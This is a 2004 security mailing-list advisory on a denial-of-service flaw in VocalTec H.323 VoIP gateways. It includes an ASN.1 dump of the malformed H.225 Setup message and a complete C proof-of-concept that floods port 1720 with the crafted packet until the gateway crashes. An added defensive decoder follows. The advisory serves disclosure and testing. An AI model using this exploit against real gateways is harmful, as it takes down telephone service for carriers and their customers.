[NEWS] VocalTec VoIP Gateway (vtg120, vtg480) DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 06/02/04
To: list@securiteam.com Date: 2 Jun 2004 10:57:16 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
VocalTec VoIP Gateway (vtg120, vtg480) DoS
------------------------------------------------------------------------
SUMMARY
"VocalTec offers a diverse range of low and high density H.323 gateways,
enabling carriers to select equipment that is best suited for a particular
installation." (<http://www.vocaltec.com/html/indexx/index-gateways.shtml>)
An attacker can cause a denial of service on the gateway by exploiting a
problem in the way the gateways parse H.225 call-signalling messages. Either
the vtgw service stops, or the host operating system itself crashes.
DETAILS
Vulnerable Systems:
* Vocaltec VoIP Gateway vtg120, vtg480
Whenever the VocalTec gateway receives a Setup whose H.225 UUIE carries a
tunnelledSignallingMessage with a tunnelledProtocolID of the form
id = tunnelledProtocolAlternateID, it fails to process the message if the
protocolIdentifier is H.225v4 (0.0.8.2250.0.4). After roughly ten such
messages a denial-of-service condition occurs: either the vtgw service stops
or crashes, or the host operating system itself crashes.
An excerpt of the offending message in ASN.1 notation is shown below:
{
  q931pdu = {
    protocolDiscriminator = 8
    callReference = 4
    from = originator
    messageType = Setup
    IE: Bearer-Capability = {
      80 90 a5 ...
    }
    IE: Calling-Party-Number = {
      81 31 32 33 34 35 36 37 38 39 30 .1234567890
    }
    IE: Called-Party-Number = {
      81 31 32 33 34 31 32 33 34 35 36 37 .12341234567
    }
    IE: User-User = { decode to h225pdu }
  }
  h225pdu = {
    h323_uu_pdu = {
      h323_message_body = setup {
        protocolIdentifier = 0.0.8.2250.0.4 <<-------- H.225v4
        sourceInfo = {
          vendor = {
            vendor = {
              t35CountryCode = 1
              t35Extension = 2
              manufacturerCode = 3
            }
          }
          gateway = {
            protocol = 1 entries {
              [0]=voice {
                supportedPrefixes = 0 entries {
                }
              }
            }
          }
          mc = FALSE
          undefinedNode = FALSE
        }
        activeMC = FALSE
        conferenceID = 16 octets {
          61 62 63 64 65 66 67 68 61 62 63 64 65 66 67 68
        }
        conferenceGoal = create <<null>>
        callType = pointToPoint <<null>>
        sourceCallSignalAddress = ipAddress {
          ip = 4 octets {
            ac 10 01 01
          }
          port = 666
        }
        callIdentifier = {
          guid = 16 octets {
            62 62 63 64 65 66 67 68 61 62 63 64 65 66 67 68
          }
        }
        fastStart = 2 entries {
          [0]= 18 octets {
            00 00 00 0d 40 01 80 0a 04 00 01 00 ac 10 01 01
            47 f1
          }
          [1]= 29 octets {
            40 00 00 06 04 01 00 4d 40 01 80 11 14 00 01 00
            ac 10 01 01 47 f0 00 ac 10 01 01 47 f1
          }
        }
        mediaWaitForConnect = FALSE
        canOverlapSend = FALSE
        multipleCalls = TRUE
        maintainConnection = TRUE
        symmetricOperationRequired = <<null>>
      }
      h245Tunneling = TRUE
      nonStandardControl = 1 entries {
        [0]={
          nonStandardIdentifier = h221NonStandard {
            t35CountryCode = 1
            t35Extension = 2
            manufacturerCode = 3
          }
          data = {...}
        }
      }
      tunnelledSignallingMessage = {
        tunnelledProtocolID = {
          id = tunnelledProtocolAlternateID {
            protocolType = "abcd"
          }
        }
        messageContent = 1 entries {
          [0]= {...}
        }
      }
    }
  }
}
Many VoIP gateways construct and parse their signalling messages in the
manner shown above, so other gateways may be vulnerable to similar packets.
Below is proof-of-concept code that sends the message and can be used to test
your gateway:
Exploit:
/* Opens one TCP connection to port 1720 per attempt, sends the Setup message
 * below, and repeats every 100 ms until the target refuses the connection
 * (ECONNREFUSED) or resets it during the send (EPIPE), which the code takes
 * as the vtgw service having gone down. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>
#define H323_SIGNAL_PORT 1720
/* TPKT header (version 3, length 0x0157 = 343 bytes) followed by the Q.931
 * Setup: protocol discriminator 0x08, two-octet call reference 4, message
 * type 0x05 (SETUP), Bearer-Capability (0x04), Calling-Party-Number (0x6c)
 * and Called-Party-Number (0x70) IEs, then the User-User IE (0x7e, two-octet
 * length 0x012b) carrying the PER-encoded H.225 Setup-UUIE dumped above. */
unsigned char kill_buff[] = {
0x03, 0x00, 0x01, 0x57, 0x08, 0x02, 0x00, 0x04, 0x05, 0x04, 0x03, 0x80,
0x90, 0xa5, 0x6c, 0x0b,
0x81, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x70,
0x0c, 0x81, 0x31, 0x32,
0x33, 0x34, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x7e, 0x01, 0x2b,
0x05, 0x20, 0x80, 0x06,
0x00, 0x08, 0x91, 0x4a, 0x00, 0x04, 0x28, 0x00, 0xb5, 0x00, 0x00, 0x12,
0x40, 0x01, 0x3c, 0x05,
0x01, 0x00, 0x00, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61,
0x62, 0x63, 0x64, 0x65,
0x66, 0x67, 0x68, 0x00, 0x8d, 0x1d, 0x82, 0x07, 0x00, 0xac, 0x10, 0x01,
0x01, 0x02, 0x9a, 0x11,
0x00, 0x62, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63,
0x64, 0x65, 0x66, 0x67,
0x68, 0x32, 0x02, 0x12, 0x00, 0x00, 0x00, 0x0d, 0x40, 0x01, 0x80, 0x0a,
0x04, 0x00, 0x01, 0x00,
0xac, 0x10, 0x01, 0x01, 0x47, 0xf1, 0x1d, 0x40, 0x00, 0x00, 0x06, 0x04,
0x01, 0x00, 0x4d, 0x40,
0x01, 0x80, 0x11, 0x14, 0x00, 0x01, 0x00, 0xac, 0x10, 0x01, 0x01, 0x47,
0xf0, 0x00, 0xac, 0x10,
0x01, 0x01, 0x47, 0xf1, 0x01, 0x00, 0x01, 0x00, 0x01, 0x80, 0x01, 0x80,
0x00, 0x0a, 0xa8, 0x01,
0x80, 0x6f, 0x01, 0x40, 0xb5, 0x00, 0x00, 0x12, 0x68, 0xe0, 0x01, 0x01,
0x00, 0x01, 0x1c, 0x58,
0x1c, 0x39, 0x9e, 0x01, 0x00, 0x03, 0x67, 0x74, 0x64, 0x00, 0x00, 0x00,
0x2e, 0x49, 0x41, 0x4d,
0x2c, 0x0d, 0x0a, 0x47, 0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65,
0x31, 0x35, 0x65, 0x62,
0x66, 0x31, 0x38, 0x31, 0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64,
0x39, 0x63, 0x39, 0x65,
0x62, 0x30, 0x62, 0x31, 0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a, 0xa1,
0x04, 0x03, 0x90, 0x90,
0xa3, 0x18, 0x03, 0xa1, 0x83, 0x9f, 0x1e, 0x02, 0x81, 0x83, 0x70, 0x0c,
0x81, 0x37, 0x30, 0x39,
0x35, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x04, 0x80, 0x06, 0x00,
0x04, 0x00, 0x00, 0x00,
0x03, 0x35, 0x02, 0x04, 0x67, 0x74, 0x64, 0x01, 0x2e, 0x49, 0x41, 0x4d,
0x2c, 0x0d, 0x0a, 0x47,
0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65, 0x31, 0x35, 0x65, 0x62,
0x66, 0x31, 0x38, 0x31,
0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64, 0x39, 0x63, 0x39, 0x65,
0x62, 0x30, 0x62, 0x31,
0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a};
/* Returns 0 if the message was sent, 1 if the target refused the connection
 * or dropped it during the send (treated as the service being down), and -1
 * on any other error. */
int nuke_victim(char * ip)
{
    int sock;
    struct sockaddr_in vict_addr;
    if ((sock=socket(AF_INET, SOCK_STREAM, 0))==-1)
    {
        perror("nuke_victim()::socket()");
        return -1;
    }
    memset(&vict_addr, 0, sizeof(vict_addr));
    vict_addr.sin_family=AF_INET;
    if (inet_pton(AF_INET, ip, &vict_addr.sin_addr)!=1)
    {
        fprintf(stderr, "nuke_victim(): invalid IPv4 address %s\n", ip);
        close(sock);
        return -1;
    }
    vict_addr.sin_port=htons(H323_SIGNAL_PORT);
    if (connect(sock, (struct sockaddr *) &vict_addr, sizeof(vict_addr))==-1)
    {
        close(sock);
        if (errno==ECONNREFUSED) return 1;
        perror("nuke_victim()::connect()");
        return -1;
    }
    /* MSG_NOSIGNAL turns a reset by the target into EPIPE instead of SIGPIPE */
    if (send(sock,kill_buff,sizeof(kill_buff),MSG_NOSIGNAL)!=sizeof(kill_buff))
    {
        close(sock);
        if (errno==EPIPE) return 1;
        perror("nuke_victim()::send()");
        return -1;
    }
    close(sock);
    return 0;
}
int main(int argc, char ** argv)
{
    int ret_flag=0;
    int try_count=0;
    if (argc<2)
    {
        fprintf(stderr, "Usage: %s <victim IP>\n", argv[0]);
        return 1;
    }
    /* Keep sending until the gateway stops answering on port 1720 */
    while((ret_flag=nuke_victim(argv[1]))==0)
    {
        try_count++;
        usleep(100000);
    }
    if (ret_flag==-1)
    {
        printf("Execution aborted with internal error\n");
        return 1;
    }
    printf("Victim %s successfully nuked with %d tries\n", argv[1], try_count);
    return 0;
}
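The exploit buffer is raw wire format: a TPKT header, a Q.931 Setup with its information elements, and the PER-encoded H.225 Setup-UUIE inside the User-User IE. The decoder below is an added example, not part of the advisory or of VocalTec's code: it parses that framing over the PoC bytes, rejects a message whose TPKT length or IE lengths disagree with what arrived, and extracts the protocolIdentifier OID, which is the H.225v4 marker the advisory singles out. The names poc, q931_setup, parse_setup and oid_to_string are this example's own, and the fixed 16-bit PER preamble used to locate the OID is its own derivation from the H.225.0 ASN.1 rather than something the advisory states. The nested tunnelledSignallingMessage is not decoded here, since that needs a full PER decoder.

```c
/* Added example, not part of the advisory: decoder for the framing around
 * the Setup above (TPKT -> Q.931 -> IEs -> H.225.0 User-User IE -> PER
 * preamble -> protocolIdentifier). The 16-bit PER preamble used below is
 * this example's derivation from the H.225.0 ASN.1, not an advisory claim. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static const uint8_t poc[] = {  /* byte-for-byte copy of the exploit's kill_buff */
    0x03,0x00,0x01,0x57,0x08,0x02,0x00,0x04,0x05,0x04,0x03,0x80,0x90,0xa5,0x6c,0x0b,
    0x81,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0x70,0x0c,0x81,0x31,0x32,
    0x33,0x34,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x7e,0x01,0x2b,0x05,0x20,0x80,0x06,
    0x00,0x08,0x91,0x4a,0x00,0x04,0x28,0x00,0xb5,0x00,0x00,0x12,0x40,0x01,0x3c,0x05,
    0x01,0x00,0x00,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x61,0x62,0x63,0x64,0x65,
    0x66,0x67,0x68,0x00,0x8d,0x1d,0x82,0x07,0x00,0xac,0x10,0x01,0x01,0x02,0x9a,0x11,
    0x00,0x62,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x61,0x62,0x63,0x64,0x65,0x66,0x67,
    0x68,0x32,0x02,0x12,0x00,0x00,0x00,0x0d,0x40,0x01,0x80,0x0a,0x04,0x00,0x01,0x00,
    0xac,0x10,0x01,0x01,0x47,0xf1,0x1d,0x40,0x00,0x00,0x06,0x04,0x01,0x00,0x4d,0x40,
    0x01,0x80,0x11,0x14,0x00,0x01,0x00,0xac,0x10,0x01,0x01,0x47,0xf0,0x00,0xac,0x10,
    0x01,0x01,0x47,0xf1,0x01,0x00,0x01,0x00,0x01,0x80,0x01,0x80,0x00,0x0a,0xa8,0x01,
    0x80,0x6f,0x01,0x40,0xb5,0x00,0x00,0x12,0x68,0xe0,0x01,0x01,0x00,0x01,0x1c,0x58,
    0x1c,0x39,0x9e,0x01,0x00,0x03,0x67,0x74,0x64,0x00,0x00,0x00,0x2e,0x49,0x41,0x4d,
    0x2c,0x0d,0x0a,0x47,0x43,0x49,0x2c,0x33,0x39,0x61,0x65,0x65,0x31,0x35,0x65,0x62,
    0x66,0x31,0x38,0x31,0x31,0x64,0x33,0x38,0x30,0x30,0x62,0x64,0x39,0x63,0x39,0x65,
    0x62,0x30,0x62,0x31,0x33,0x35,0x65,0x0d,0x0a,0x0d,0x0a,0xa1,0x04,0x03,0x90,0x90,
    0xa3,0x18,0x03,0xa1,0x83,0x9f,0x1e,0x02,0x81,0x83,0x70,0x0c,0x81,0x37,0x30,0x39,
    0x35,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x04,0x80,0x06,0x00,0x04,0x00,0x00,0x00,
    0x03,0x35,0x02,0x04,0x67,0x74,0x64,0x01,0x2e,0x49,0x41,0x4d,0x2c,0x0d,0x0a,0x47,
    0x43,0x49,0x2c,0x33,0x39,0x61,0x65,0x65,0x31,0x35,0x65,0x62,0x66,0x31,0x38,0x31,
    0x31,0x64,0x33,0x38,0x30,0x30,0x62,0x64,0x39,0x63,0x39,0x65,0x62,0x30,0x62,0x31,
    0x33,0x35,0x65,0x0d,0x0a,0x0d,0x0a
};

struct q931_setup {
    uint16_t tpkt_len, call_ref;           /* TPKT length field; Q.931 call reference */
    uint8_t msg_type;                      /* 0x05 = SETUP */
    char called[32], protocol_id[48];      /* Called Party Number digits; Setup-UUIE OID */
    const uint8_t *uuie; size_t uuie_len;  /* H.225.0 User-User IE contents */
};

/* X.690 OBJECT IDENTIFIER content octets -> dotted string; -1 if malformed. */
static int oid_to_string(const uint8_t *p, size_t n, char *out, size_t outsz)
{
    size_t off = 0; unsigned v = 0; int first = 1, pending = 0, k;
    out[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        v = (v << 7) | (p[i] & 0x7f);
        if ((pending = p[i] & 0x80)) continue;        /* subidentifier continues */
        k = first ? snprintf(out + off, outsz - off, "%u.%u", v / 40, v % 40)
                  : snprintf(out + off, outsz - off, ".%u", v);
        if (k < 0 || (size_t)k >= outsz - off) return -1;
        off += (size_t)k; v = 0; first = 0;
    }
    return (pending || first) ? -1 : 0;
}

/* Returns 0 or a negative code naming the check that rejected the message. */
static int parse_setup(const uint8_t *buf, size_t len, struct q931_setup *s)
{
    memset(s, 0, sizeof *s);
    if (len < 6 || buf[0] != 0x03) return -1;                   /* TPKT version 3 */
    s->tpkt_len = (uint16_t)((buf[2] << 8) | buf[3]);
    if (s->tpkt_len != len) return -2;                          /* TPKT length vs bytes received */
    if (buf[4] != 0x08) return -3;                              /* Q.931 protocol discriminator */
    size_t crlen = buf[5] & 0x0f, off = 6;
    if (crlen == 0 || crlen > 2 || off + crlen + 1 > len) return -4;
    s->call_ref = buf[off] & 0x7f;                              /* high bit is the from-originator flag */
    if (crlen == 2) s->call_ref = (uint16_t)((s->call_ref << 8) | buf[off + 1]);
    off += crlen;
    s->msg_type = buf[off++] & 0x7f;
    while (off < len) {                                         /* walk the IEs */
        uint8_t ie = buf[off++];
        size_t ielen;
        if (ie & 0x80) continue;                                /* single-octet IE (e.g. Shift) */
        if (ie == 0x7e) {                                       /* H.225.0: User-User has a 2-octet length */
            if (off + 2 > len) return -5;
            ielen = ((size_t)buf[off] << 8) | buf[off + 1]; off += 2;
        } else {
            if (off + 1 > len) return -5;
            ielen = buf[off++];
        }
        if (ielen > len - off) return -6;                       /* IE overruns the message */
        if (ie == 0x70 && ielen > 1)                            /* Called Party Number: octet 3, then IA5 digits */
            memcpy(s->called, buf + off + 1, ielen - 1 < 31 ? ielen - 1 : 31);
        else if (ie == 0x7e) { s->uuie = buf + off; s->uuie_len = ielen; }
        off += ielen;
    }
    if (!s->uuie || s->uuie_len < 4 || s->uuie[0] != 0x05) return -7;  /* X.209 user-information discriminator */
    /* PER preamble: H323-UserInformation (ext + 1 optional), H323-UU-PDU (ext + 1
     * optional), h323-message-body CHOICE (ext + 3-bit index) and Setup-UUIE (ext +
     * 7 optionals) total 16 bits, so for a root-alternative Setup uuie[3] is the
     * protocolIdentifier length octet and the OID content follows it. */
    if (s->msg_type == 0x05 && (s->uuie[1] & 0x0f) == 0) {     /* CHOICE ext 0, index 0 = setup */
        size_t n = s->uuie[3];
        if (n > s->uuie_len - 4) return -8;
        if (oid_to_string(s->uuie + 4, n, s->protocol_id, sizeof s->protocol_id)) return -9;
    }
    return 0;
}

int main(void)
{
    struct q931_setup s;
    int rc = parse_setup(poc, sizeof poc, &s);
    if (rc) { printf("rejected: %d\n", rc); return 1; }
    printf("SETUP callref %u to %s, UUIE %zu bytes, protocolIdentifier %s\n",
           s.call_ref, s.called, s.uuie_len, s.protocol_id);
    return 0;
}
```

Compile with cc -std=c99 and run: on the PoC it reports call reference 4, called party 12341234567, a 299-byte UUIE and protocolIdentifier 0.0.8.2250.0.4, i.e. H.225.0 version 4. Shorten the buffer by one byte and the message is rejected at the TPKT length check, the first consistency check a gateway's own parser should make before it touches the H.225 body.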
ADDITIONAL INFORMATION
The information has been provided by <mailto:pk95@yandex.ru> Alexander.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.